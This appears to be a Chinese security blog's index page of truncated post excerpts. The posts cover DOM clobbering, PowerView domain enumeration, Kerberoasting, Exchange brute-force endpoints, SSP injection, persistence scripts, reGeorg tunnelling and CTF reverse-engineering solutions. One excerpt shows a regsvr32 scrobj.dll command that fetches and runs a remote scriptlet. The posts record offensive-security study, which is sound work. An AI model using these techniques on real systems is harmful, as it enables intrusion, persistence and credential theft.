rv0p111

DOM clobberingHow to exploit DOM-clobbering vulnerabilitiesExploiting DOM clobbering to enable XSS主要是学习了下这个相关的知识点，目的只是想要记录下分析过程，介绍的话就直接引用相关文章的内容了DOM 破坏是一种将 HTML 注入页面以操作 DOM 并最终更改页面上 JavaScript 行为的技术。DOM clobbering 在XSS不可能的情况下特别有用，但您可以控制页面上的某些 HTML，其中属性i

main函数的前世今生main函数其实是我们能控制的程序入口，但是程序编译之后进行执行却不是从main函数开始的，这里主要讲解下VC6.0++下编译的程序在执行main函数之前的流程，其实主要为在执行main函数之前做了环境变量和参数个数以及参数的解析，然后初始化一些全局变量、堆、io等内容/****crt0.c - C runtime initialization routine** ...

Get-DomainGroupMemberfunction Get-DomainGroupMember {<#.SYNOPSISReturn the members of a specific domain group.Author: Will Schroeder (@harmj0y) License: BSD 3-Clause Required Dependencies:...

获取域的有关信息filter Get-NetDomain {<# .SYNOPSIS Returns a given domain object. .PARAMETER Domain The domain name to query for, defaults to the current domain. .PARAMETER Cr...

当我们无法获取回显判断进程是否存活的方法调用命令regsvr32 /s /n /u /i:<url/aa.sct> scrobj.dll<?XML version="1.0"?><scriptlet><registration progid="TESTING" classid="{A1112221-0000-0000-3000-000DA0...

Exchange可以拿来爆破的接口1、EWS 服务 URL，exchange web 服务配置https://192.168.88.129/ews/exchange.asmx2、还可以是owa接口–提供WEB方式邮件访问功能https://192.168.88.129/owa3、可以是AUTODISCOVER自动发现服务根据您是否在单独的站点上配置了自动发现服务，自动发现...

使用PEiD查看下是.net程序，这个程序是可以直接进行反编译的所以我们使用ILSpy进行反编译下，我们可以看到程序就是叫我们输入一个字符串，然后和Kanxue2019一起给传入a函数当中，算结果为4RTlF9Ca2+oqExJwx68FiA==所以下面我们看下a函数，ICryptoTransform是拿来做加密转换的，RijndaelManaged类是拿来做AES算法的一个类，...

查看导出表，就一个main函数打开strings窗口，查看strings，可以看到下面是有很多字符串的程序运行，输出结果如下所示，所以我们需要去定位到这个字符串，看看是哪里调用的在我们的sub_4014C0当中被用到了查看伪代码如下所示scanf以后是sub_004012F0这个函数验证,验证从第8位开始之后的12位字符，要全部相等，然后以及我们输入的字符...

安卓题目，应该就是有关动态库的题目了，所用对动态库进行分析，利用工具IDA、jeb、vs等利用IDA动态调试，对sub_784进行分析，可以确定其实就是是rc4加密算法，以及下面的进行编码的业务逻辑组成用到的其实就是RC4算法： 1、密钥流：RC4算法的关键是根据明文和密钥生成相应的密钥流，密钥流的长度和明文的长度是对应的，也就是说明文的长度是500字节，那么密钥流也是500字节。当然...

利用中文引擎搜索搜索到Kanxuectf这一串字符串的所在，然后下断点之后就会发现它在和我们做比较，然后我们输入的26个大写的英文字母变成了下面的内容89opqrstuvwxyzOPQRSTUVWXYZm然后我们就找到了下面的对应关系，然后我们需要从右边的字符串当中找到KanXueCTF2019JustForhappy，对应的左边的字符串0 a1 b2 c3 d4 e5 f...

此篇文章结合学到的知识做个总结微软有个api为AddSecurityPackage，可以添加ssp，这里就看下其的实现逻辑，这里从将从公开这个 API 的 secur32.dll 这个 DLL 文件开始，主要为本人进行了修改以及自己去复现的总结在 Ghidra 打开这个 DLL 文件，这实际上只是一个调用 sspcli.dll 的包装器我们这边主要是看sspicli.dll的实现逻辑是...

下面是3g老师的代码function Invoke-LibraryFilesPersistence{ <#.SYNOPSISFirst modify the registry and then create a file named Documents.library-ms in %appdata%\Microsoft\Windows\Start Menu\Programs\Acc...

ISAPI 筛选器(ISAPI filter)导出函数1、BOOL WINAPI GetFilterVersion( PHTTP_FILTER_VERSION pVer);该函数是DLL筛选器第一次被加载到站点处理进程时被调用。2、DWORD WINAPI HttpFilterProc(PHTTP_FILTER_CONTEXT pfc,DWORD notificationType,LPVO...

C#代码分析$code = @' using System; using System.Runtime.InteropServices; using System.Drawing; using System.Drawing.Imaging; namespace ScreenShotDemo { /// <summary> /// Provides functi...

代码如下所示# Edits by Tim Medin# File: GetUserSPNS.ps1# Contents: Query the domain to find SPNs that use User accounts# Comments: This is for use with Kerberoast https://github.com/nidem/kerberoast...

首先先创建一个socket去运行，去连接想要连接的端口reGeorgSocksProxy客户端与服务端的通讯是基于session来区分的，并不支持在指定的session下进行socket_set_nonblock 设置socket为非阻塞ob_end_clean()时缓冲区内容将被丢弃socket_write($socket参数1，$msg参数2，$strlen参数3)　　　　作用：把数...